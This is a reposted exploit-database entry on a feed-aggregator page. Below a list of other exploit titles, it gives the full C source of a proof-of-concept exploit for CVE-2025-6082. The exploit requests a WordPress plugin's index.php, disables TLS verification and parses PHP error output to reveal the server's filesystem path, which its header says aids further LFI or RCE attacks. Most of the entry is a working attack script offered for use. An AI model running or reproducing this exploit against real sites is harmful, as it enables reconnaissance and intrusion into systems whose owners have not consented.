惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

C
CXSECURITY Database RSS Feed - CXSecurity.com
K
Kaspersky official blog
A
Arctic Wolf
Attack and Defense Labs
Attack and Defense Labs
L
LINUX DO - 热门话题
N
News | PayPal Newsroom
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
L
Lohrmann on Cybersecurity
PCI Perspectives
PCI Perspectives
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
The Last Watchdog
The Last Watchdog
B
Blog RSS Feed
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
W
WeLiveSecurity
Know Your Adversary
Know Your Adversary
博客园 - Franky
T
Tenable Blog
T
Tailwind CSS Blog
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
Help Net Security
Help Net Security
WordPress大学
WordPress大学
T
The Exploit Database - CXSecurity.com
www.infosecurity-magazine.com
www.infosecurity-magazine.com
博客园 - 司徒正美
阮一峰的网络日志
阮一峰的网络日志
D
Darknet – Hacking Tools, Hacker News & Cyber Security
H
Heimdal Security Blog
TaoSecurity Blog
TaoSecurity Blog
S
Security Affairs
J
Java Code Geeks
小众软件
小众软件
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
Apple Machine Learning Research
Apple Machine Learning Research
NISL@THU
NISL@THU
O
OpenAI News
The Cloudflare Blog
月光博客
月光博客
Google Online Security Blog
Google Online Security Blog
V
V2EX
罗磊的独立博客
美团技术团队
博客园 - 三生石上(FineUI控件)
Security Latest
Security Latest
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
C
Cyber Attacks, Cyber Crime and Cyber Security
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Cyberwarzone
Cyberwarzone
L
LINUX DO - 最新话题
Hacker News - Newest:
Hacker News - Newest: "LLM"
大猫的无限游戏
大猫的无限游戏

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure
2025-12-28 · via The Exploit Database - CXSecurity.com

Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure

/* * Exploit Title : Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure * Author : Byte Reaper * Telegram : @ByteReaper0 * CVE : CVE-2025-6082 * Software Link : https://frp.wordpress.org/plugins/birth-chart-compatibility/ * Description : Proof‑of‑Concept exploits the Full Path Disclosure bug in the * “Birth Chart Compatibility” WordPress plugin (<=v2.0). It sends * an HTTP GET request to the plugin’s index.php endpoint, captures * the resulting PHP warning or fatal error, and parses the server’s * filesystem path (e.g. “/var/www/html/wp-content/plugins/…” or * “C:\\xampp\\htdocs\\…”). Revealing this path aids attackers in * chaining further LFI/RCE or reconnaissance attacks. */ #include<stdio.h> #include"argparse.h" #include<string.h> #include <stdlib.h> #include <curl/curl.h> #include <unistd.h> #define FULL 2300 const char *url = NULL; const char *cookies=NULL; int selecetCookie = 0; int verbose = 0; void exitSyscall() { __asm__ volatile ( "xor %%rdi, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "syscall\n\t" : : :"rax", "rdi" ); } const char *keyFound[] = { "Warning:", "Fatal error:", "/var/www/", "C:\\xampp\\" }; struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n"); exitSyscall(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } void showPath(const char *targetUrl) { char full[FULL]; CURLcode curlCode; struct Mem response = {NULL, 0}; CURL *curl = curl_easy_init(); if (curl == NULL) { exitSyscall(); } response.buffer = NULL; response.len = 0; if (verbose) { printf("==========================================\e[0m\n"); printf("[+] Cleaning Response...\e[0m\n"); printf("[+] Response Buffer : %s\e[0m\n", response.buffer); printf("[+] Response Len : %zu\e[0m\n", response.len); printf("==========================================\e[0m\n"); } fflush(stdout); if (curl) { snprintf(full, sizeof(full), "%s/wp-content/plugins/birth-chart-compatibility/index.php", targetUrl); curl_easy_setopt(curl, CURLOPT_URL, full); if (selecetCookie) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_ACCEPT_ENCODING, ""); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); sleep(1); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); if (verbose) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } struct curl_slist *h = NULL; h = curl_slist_append(h, "Accept: text/html"); h = curl_slist_append(h, "Accept-Encoding: gzip"); h = curl_slist_append(h, "Accept-Language: en-US,en"); h = curl_slist_append(h, "Connection: keep-alive"); h = curl_slist_append(h, "Referer: http://example.com"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h); long httpCode = 0; curlCode = curl_easy_perform(curl); if (curlCode == CURLE_OK) { printf("---------------------------------------------------------------------------------------\n"); printf("\e[1;36m[+] Request sent successfully\e[0m\n"); printf("\e[1;33m[+] Input Url : %s\e[0m\n", targetUrl); printf("\e[1;33m[+] Full Format Url : %s\e[0m\n",full); curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); int numberKey = sizeof(keyFound) / sizeof(keyFound[0]); if (httpCode >= 200 && httpCode < 300) { printf("[+] Http Code (200 < 300) !\e[0m\n"); printf("\e[1;32m[+] Http Code : %ld\e[0m\n", httpCode); printf("\e[1;35m====================================[Response]====================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len); printf("\e[1;35m===================================================================================\e[0m\n\n"); for (int k = 0; k < numberKey; k++) { const char *found = strstr(response.buffer, keyFound[k]); if (found) { printf("\e[1;34m[+] Keyword found: %s\e[0m\n", keyFound[k]); printf("\e[1;34m[+] Context: %.100s\e[0m\n", found); } } } else { printf("\e[1;31m[-] Http Code : %ld\e[0m\n", httpCode); printf("\e[1;31m[-] Please Check Your input Path !\e[0m\n"); printf("\e[1;31m[-] Or Connection in Tragte : (%s)\e[0m\n", targetUrl); if (verbose) { printf("\e[1;35m====================================[Response]====================================\n"); printf("%s\n", response.buffer); printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len); printf("\e[1;35m===================================================================================\n\n"); } } } else { printf("\e[1;31m[-] The request was not sent !\e[0m\n"); if (verbose) { printf("\e[1;31m[-] Exit Syscall ...\e[0m\n"); } printf("\e[1;31m[-] Error : %s\n", curl_easy_strerror(curlCode)); exitSyscall(); } } if (response.buffer) { free(response.buffer); response.buffer = NULL; response.len = 0; } curl_easy_cleanup(curl); } int main(int argc, const char **argv) { printf ( "\e[1;91m" "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖ \n" "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▖▛▌▙▌▄▌ \n" "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▙▌█▌▙▌▙▖ \n" "\e[1;97m\t Byte Reaper\e[0m\n" ); printf("\e[1;91m---------------------------------------------------------------------------------------\e[0m\n"); int loop = 0; struct argparse_option options[] = { OPT_HELP(), OPT_STRING('u', "url", &url, "Target Url (Base Url)"), OPT_STRING('c', "cookies", &cookies, "cookies File"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_INTEGER('f', "loop", &loop, "For loop (Request) (Ex : -f 10)"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (!url) { printf("\e[1;31m[-] Please Enter Target Url !\e[0m\n"); printf("\e[1;31m[-] Ex : ./exploit -u https://target.com\e[0m\n"); exitSyscall(); } if (verbose) { verbose=1; } if (cookies) { selecetCookie = 1; } if (loop) { for (int o = 0; o < loop ; o++) { showPath(url); } } showPath(url); return 0; }



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}